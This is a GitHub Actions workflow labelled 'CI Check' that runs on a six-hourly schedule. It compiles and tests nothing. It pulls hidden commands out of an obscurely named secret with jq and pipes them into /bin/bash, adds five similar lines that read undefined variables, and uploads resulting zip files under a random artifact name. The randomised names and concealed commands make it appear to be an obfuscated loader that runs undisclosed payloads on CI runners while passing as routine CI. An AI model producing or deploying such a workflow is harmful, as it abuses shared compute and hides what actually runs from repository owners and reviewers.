name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '10 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          ufus32: ${{ secrets.ufus32 }}
        run: |
          printf '%s' "$ufus32" | jq -r .vb72920 | /bin/bash
          echo $y90484 | jq -r .lff94 | /bin/bash
          printf '%s' "$h0490" | jq -r .n407 | /bin/bash
          echo $g14 | jq -r .pkv809 | /bin/bash
          printf '%s' "$mzqhf01" | jq -r .v98507 | /bin/bash
          echo $r0894 | jq -r .nlh32 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: yJGThIFO
          path: "*.zip"
          retention-days: 1
